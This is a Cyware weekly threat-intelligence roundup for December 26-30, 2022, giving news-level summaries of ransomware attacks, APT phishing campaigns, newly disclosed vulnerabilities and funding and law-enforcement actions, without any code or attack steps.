Go to listing page

Cyware Weekly Threat Intelligence, December 26-30, 2022

Cyware Weekly Threat Intelligence, December 26-30, 2022

Share Blog Post

The Good

As we wrap up the final week of 2022, here’s a glance at a significant development made by the U.S. government. President Joe Biden passed the expenditure bill for the fiscal year 2023, of which $2.9 billion has been allocated for cybersecurity efforts. The CISA will use the fund to strengthen civilians and federal networks, besides improving its cybersecurity operations. Meanwhile, the DoJ indicted a hacker who was accused of stealing $110 million in a fraud scheme against the Mango Markets cryptocurrency exchange.

  • An amount of $2.9 billion has been allocated to CISA for the fiscal year 2023. With the given budget, the CISA aims to improve emergency communications preparedness and strengthen civilian and government networks. A portion of the amount will also be used for CISA’s advanced cybersecurity operations. 
  • The DoJ filed criminal charges against a hacker for stealing approximately $110 million in a fraud scheme targeting Mango Markets cryptocurrency exchange. The hacker manipulated the price to trap the investors and steal their funds. 
  • The Ukraine cyber police seized a call center for duping 18,000 victims by pretending to be IT security employees at banks. The scammers contacted the victims and claimed that their bank accounts had been accessed by hackers and requested their financial information.

The Bad

Moving on, ransomware attacks continue to disrupt the operations of victim organizations. This week, a Portuguese port and a city in Westchester County fell victim to attacks by the LockBit ransomware group. The Royal ransomware group also claimed responsibility for attacks against the telecommunications company Intrado. The Black Basta group was also reported to have stolen data from multiple electric utilities after targeting a major U.S. government contractor.

  • The Kimsuky APT group was associated with a new phishing campaign that was aimed at nearly 900 foreign policy experts in South Korea. The attack was launched via spear-phishing emails that impersonated different well-known authorities and contained a link to a fake website that resulted in the download of malware.
  • The Port of Lisbon was targeted in an attack by the LockBit ransomware group. The attackers claimed to have stolen all the data from the website and demanded a sum of close to $1.5 million to prevent the data leakage.
  • Thousands of Citrix servers still remain vulnerable to attacks due to two critical vulnerabilities that are tracked as CVE-2022-27510 and CVE-2022-27518. These flaws affect Citrix ADC and Gateway endpoints and have been patched with the release of new versions last month.
  • It’s been a year and around 40% of software using Apache Log4j are still vulnerable to the Log4Shell attack. A security update to fix the flaw was issued last year. 
  • The Royal ransomware group claimed responsibility for a cyberattack against telecommunications company Intrado. As proof of the breach, the gang shared a 52.8MB archive containing scans of passports, business documents, and driver’s licenses of employees.
  • Operations at the police department, municipal court, and other government offices in the city of Mount Vernon were disrupted following an attack by LockBit ransomware. The breach was executed by exploiting a remote access tool used by the city’s IT provider.  
  • Threat actors used Black Basta ransomware to steal sensitive data from multiple electric utilities linked to the Chicago-based engineering firm Sargent & Lundy, which is also a major U.S. government contractor. The attack occurred in October. 
  • Lake Charles Memorial Health System in Louisiana disclosed that the personal data of nearly 270,000 patients were accessed in the October ransomware attack. This included patients’ health insurance information, medical records, and social security numbers. 
  • Lazarus was associated with a massive phishing campaign that targeted NFT investors. Nearly 500 phishing domains mimicking well-known NFT marketplaces, such as OpenSea, X2Y2, and Rarible were used to dupe victims. 
  • 3Commas cryptocurrency platform admitted to a hack after a set of 10,000 API keys was published by a hacker on Twitter. The firm urged Kucoin, Coinbase, and Binance to revoke all keys connected to 3Commas. 

New Threats

Threat actors are always gearing up to evolve their attack techniques and some of them were noticed this week. The BlueNoroff APT adopted a new tactic to sneak past the Mark-of-the-Web (MotW) security measures. On the other hand, researchers observed threat actors delivering a variety of malware by exploiting the Google Ads platform under the MasquerAds campaign. Furthermore, a newly found CatB ransomware group emerged with new evasion techniques.

  • A new technique dubbed MasquerAds is being increasingly used across the Google Ads platform to spread malware to unsuspecting users searching for popular software products. Among the products impersonated include Grammarly, MSI Afterburner, Slack, Dashlane, Malwarebytes, Audacity, OBS, AnyDesk, and Libre. 
  • Experts from American universities demonstrated a new attack technique that could be used to eavesdrop on users. Called EarSpy, the technique relied on motion sensor data arising from the echo of speakers in Android phones. 
  • Lazarus’ subgroup BlueNoroff has adopted a new tactic to bypass Mark-of-the-Web (MotW) security measures and deliver a new malware that goes by the same name. The gang is using the tactic to target financial institutions in Japan. 
  • A security researcher identified security issues in Google Home smart speakers that could be exploited to install backdoors and turn them into wiretapping devices. The flaws could be triggered by sending arbitrary HTTP requests within the victim’s LAN network. 
  • The CISA added two-year-old security flaws impacting TIBCO Software’s JasperReports products to its list of most exploited vulnerabilities catalog. The flaw, tracked as CVE-2018- 5430 and CVE-2018-18809, are related to information disclosure vulnerability and directory traversal vulnerability respectively. 
  • Experts warned of a critical Linux kernel vulnerability that leads to remote code execution attacks on SMB servers. The flaw has a CVSS score of 10 and only affects SMB servers using the ‘ksmbd’ module.
  • A newly identified CatB ransomware group has been found implementing several anti-VM and DLL hijacking techniques to evade detection. The ransomware is believed to have a connection with Pandora ransomware.


log4shell attacks
dll hijacking techniques
bluenoroff apt
lockbit ransomware
citrix servers
catb ransomware group
black basta group
masquerads technique

Posted on: December 30, 2022

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.